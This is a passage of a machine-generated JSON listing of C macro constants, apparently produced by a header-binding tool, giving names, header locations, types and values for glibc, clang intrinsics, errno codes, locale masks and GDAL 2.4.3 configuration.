"/usr/include/x86_64-linux-gnu/bits/types/__FILE.h:2:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_____fpos64_t_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/__fpos64_t.h:2:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "____mbstate_t_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/__mbstate_t.h:2:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_____fpos_t_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/__fpos_t.h:2:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__time64_t", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types.h:217:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_mm512_permutevar_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8318:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__WORDSIZE_TIME64_COMPAT32", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/wordsize.h:12:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__SYSCALL_WORDSIZE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/wordsize.h:14:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 64 }, { "tag": "const", "name": "__stub_sstk", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/gnu/stubs-64.h:22:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__stub_stty", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/gnu/stubs-64.h:23:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__stub_setlogin", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/gnu/stubs-64.h:20:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__stub_sigreturn", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/gnu/stubs-64.h:21:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__stub_putmsg", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/gnu/stubs-64.h:18:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__stub_lchmod", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/gnu/stubs-64.h:17:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__stub_revoke", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/gnu/stubs-64.h:19:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__stub_getmsg", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/gnu/stubs-64.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__stub_gtty", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/gnu/stubs-64.h:16:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__stub_fchflags", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/gnu/stubs-64.h:13:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__stub_fdetach", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/gnu/stubs-64.h:14:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__stub_chflags", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/gnu/stubs-64.h:11:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_mm512_mask_permutevar_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8337:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__stub_fattach", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/gnu/stubs-64.h:12:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__stub___compat_bdflush", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/gnu/stubs-64.h:10:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__HAVE_GENERIC_SELECTION", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/cdefs.h:512:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__AVX512VLVBMI2INTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "HAVE_GIF_LIB_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:93:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_SIDD_CMP_EQUAL_EACH", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1556:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "HAVE_ICONV", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:96:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_SIDD_CMP_RANGES", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1555:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "_SIDD_POSITIVE_POLARITY", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1560:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "HAVE_GETCWD", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:87:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_SIDD_CMP_EQUAL_ORDERED", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1557:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 12 }, { "tag": "const", "name": "HAVE_GETRLIMIT", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:90:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_SIDD_SBYTE_OPS", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1550:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "HAVE_GCC_WARNING_ZERO_AS_NULL_POINTER_CONSTANT", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:78:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_GETADDRINFO", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:84:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_SIDD_UWORD_OPS", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1549:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_SIDD_CMP_EQUAL_ANY", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1554:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "HAVE_GCC_ATOMIC_BUILTINS", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:72:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_GCC_BSWAP", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:75:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_SIDD_SWORD_OPS", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1551:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 3 }, { "tag": "const", "name": "HAVE_FLOAT_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:66:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_FREEXL_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:69:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_SIDD_UBYTE_OPS", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1548:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "HAVE_ERRNO_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:60:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_FCNTL_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:63:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_CXX11", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:35:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_DECL_STRTOF", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:45:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_DLFCN_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:51:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_ATOLL", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:20:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_CHARLS_CHARLS_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:23:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_LIMITS_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:130:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_LINUX_USERFAULTFD_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:133:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_LIBQHULL_LIBQHULL_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:124:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_LIBRT", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:127:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_LIBDL", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:118:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_LIBM", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:121:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_IEEEFP", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:100:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_JPEGLIB_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:115:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_INTTYPES_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:112:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "GDAL_VERSION_REV", "ns": 0, "location": "/usr/include/gdal/gdal_version.h:12:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 3 }, { "tag": "const", "name": "GDAL_VERSION_MINOR", "ns": 0, "location": "/usr/include/gdal/gdal_version.h:11:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "GDAL_VERSION_BUILD", "ns": 0, "location": "/usr/include/gdal/gdal_version.h:13:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "DEFINED_OGRSpatialReferenceH", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:66:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "GDAL_VERSION_MAJOR", "ns": 0, "location": "/usr/include/gdal/gdal_version.h:10:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "DEFINEH_OGRGeometryH", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:54:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "GDAL_H_INCLUDED", "ns": 0, "location": "/usr/include/gdal/gdal.h:32:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "GDAL_PREFIX", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:11:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "/usr" }, { "tag": "const", "name": "CPL_MULTIPROC_PTHREAD", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:8:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_ASSERT_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:17:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_5ARGS_MREMAP", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:14:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "GDAL_RELEASE_DATE", "ns": 0, "location": "/usr/include/gdal/gdal_version.h:29:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 20191028 }, { "tag": "const", "name": "CPL_INLINE", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:386:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "CPL_BASE_H_INCLUDED", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:33:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "FORCE_CDECL", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:378:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SIDD_MOST_SIGNIFICANT", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1567:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 64 }, { "tag": "const", "name": "_mm512_setzero", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:259:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "GDAL_RELEASE_NAME", "ns": 0, "location": "/usr/include/gdal/gdal_version.h:32:11", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "2.4.3" }, { "tag": "const", "name": "HAS_CPL_INLINE", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:385:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_SIDD_BIT_MASK", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1570:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "CPL_STDCALL", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:370:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SIDD_MASKED_NEGATIVE_POLARITY", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1563:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 48 }, { "tag": "const", "name": "_SIDD_LEAST_SIGNIFICANT", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1566:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "_SIDD_NEGATIVE_POLARITY", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1561:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 16 }, { "tag": "const", "name": "GDAL_VERSION_NUM", "ns": 0, "location": "/usr/include/gdal/gdal_version.h:24:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2040300 }, { "tag": "const", "name": "CPL_ODLL", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:362:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SIDD_MASKED_POSITIVE_POLARITY", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1562:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32 }, { "tag": "const", "name": "__IA32INTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__X86INTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/x86intrin.h:11:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "CPL_IS_LSB", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:661:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "CPL_LSB", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:657:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "CPL_THREADLOCAL", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:577:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__F16CINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/f16cintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "LC_NUMERIC_MASK", "ns": 0, "location": "/usr/include/locale.h:149:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "ENOMEM", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:16:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 12 }, { "tag": "const", "name": "LC_CTYPE_MASK", "ns": 0, "location": "/usr/include/locale.h:148:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "EFAULT", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:18:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 14 }, { "tag": "const", "name": "LC_TIME_MASK", "ns": 0, "location": "/usr/include/locale.h:150:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "EACCES", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:17:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 13 }, { "tag": "const", "name": "ECHILD", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:14:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 10 }, { "tag": "const", "name": "_m_packuswb", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1506:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "EBADF", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:13:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 9 }, { "tag": "const", "name": "EAGAIN", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 11 }, { "tag": "const", "name": "LC_COLLATE_MASK", "ns": 0, "location": "/usr/include/locale.h:151:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "LC_MONETARY_MASK", "ns": 0, "location": "/usr/include/locale.h:152:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 16 }, { "tag": "const", "name": "E2BIG", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:11:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 7 }, { "tag": "const", "name": "_m_to_int64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1503:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "LC_MESSAGES_MASK", "ns": 0, "location": "/usr/include/locale.h:153:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32 }, { "tag": "const", "name": "LC_PAPER_MASK", "ns": 0, "location": "/usr/include/locale.h:154:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 128 }, { "tag": "const", "name": "ENOEXEC", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:12:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "_m_packssdw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1505:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_to_int", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1502:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "EINTR", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:8:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "ENXIO", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:10:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 6 }, { "tag": "const", "name": "_m_packsswb", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1504:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "EIO", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:9:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 5 }, { "tag": "const", "name": "LC_ADDRESS_MASK", "ns": 0, "location": "/usr/include/locale.h:156:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 512 }, { "tag": "const", "name": "ENOENT", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:6:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "EPERM", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:5:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "LC_TELEPHONE_MASK", "ns": 0, "location": "/usr/include/locale.h:157:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1024 }, { "tag": "const", "name": "ESRCH", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:7:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 3 }, { "tag": "const", "name": "LC_MEASUREMENT_MASK", "ns": 0, "location": "/usr/include/locale.h:158:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2048 }, { "tag": "const", "name": "_m_punpckhwd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1508:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_paddsb", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1516:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_ASM_GENERIC_ERRNO_H", "ns": 0, "location": "/usr/include/asm-generic/errno.h:3:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "LC_IDENTIFICATION_MASK", "ns": 0, "location": "/usr/include/locale.h:159:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4096 }, { "tag": "const", "name": "_m_punpcklbw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1510:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_ASM_GENERIC_ERRNO_BASE_H", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:3:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "LC_NAME_MASK", "ns": 0, "location": "/usr/include/locale.h:155:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 256 }, { "tag": "const", "name": "_m_punpckldq", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1512:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_ERRNO_H", "ns": 0, "location": "/usr/include/errno.h:23:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_m_punpckhbw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1507:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "LC_ALL_MASK", "ns": 0, "location": "/usr/include/locale.h:160:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8127 }, { "tag": "const", "name": "_BITS_ERRNO_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/errno.h:20:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_m_paddsw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1517:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_paddw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1514:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_punpcklwd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1511:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "LC_GLOBAL_LOCALE", "ns": 0, "location": "/usr/include/locale.h:191:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -1 }, { "tag": "const", "name": "_m_paddb", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1513:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_paddd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1515:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_paddusb", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1518:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_punpckhdq", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1509:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "ESPIPE", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:33:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 29 }, { "tag": "const", "name": "EROFS", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:34:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 30 }, { "tag": "const", "name": "ENOSPC", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:32:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 28 }, { "tag": "const", "name": "EFBIG", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:31:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 27 }, { "tag": "const", "name": "ENOTTY", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:29:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 25 }, { "tag": "const", "name": "ETXTBSY", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:30:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 26 }, { "tag": "const", "name": "EMFILE", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:28:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 24 }, { 